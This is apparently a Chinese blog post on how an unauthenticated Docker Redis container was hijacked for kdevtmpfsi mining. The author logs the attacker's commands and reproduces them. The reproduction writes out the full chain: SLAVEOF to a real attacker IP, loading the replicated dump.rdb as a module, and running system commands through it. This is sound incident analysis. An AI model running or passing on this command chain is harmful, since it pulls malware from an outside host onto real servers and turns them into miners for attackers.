docker redis被任意連結 導致被kdevtmpfsi挖礦記錄
昨天發現伺服器被挖礦了,我ssh可是都沒開的,他是怎麼用我容器挖礦的?
帶這個問題,我把redis容器再次弄成隨意連結,想釣出他執行的命令。
開始追蹤前準備
config set slowlog-log-slower-than 0 //所有命令都會被定義成慢查詢
config set slowlog-max-len 10000 //保留1w條記錄
config set slowlog-max-len 1000000 //他會不會執行很多命令? 改成保留100w保險些上鉤了
大概3-4小時,就把我容器做礦機了,真快。
是不是有檢測系統,發現我掉了…
這是redis執行過的所有命令(有部分是我的):
http://cdn.lblog.club/files/redis_log.txt
slowlog格式說明
7 slowlog的id
1585115869 執行的時間戳
15 執行命令的消耗時間 微秒
set //命令
1 //命令
test //命令 組合就是set 1 test
127.0.0.1:55968 //客戶端 埠我得到了他的執行過命令,然後我重新編譯容器,準備復現他的操作。
開始復現
127.0.0.1:6379> slaveof 82.118.17.133 8887
OK
//此時把他redis資料 同步到受害機 dump.rdb已經是有毒的模組了!
//可惜dump.rdb用rdb看不了,不知道是什麼操作,不知道這個dump.rdb的內容
127.0.0.1:6379> MODULE LOAD ./dump.rdb //載入模組
OK
127.0.0.1:6379> system.d id
""
(1184.54s)
//獲得成就:主動當礦機 成就加成:cpu+90% 記憶體+10% (使用量)
你在你的redis執行這三條命令, 就可以復現被成為礦機的場景。主動當礦機了
本作品採用《CC 協議》,轉載必須註明作者和本文連結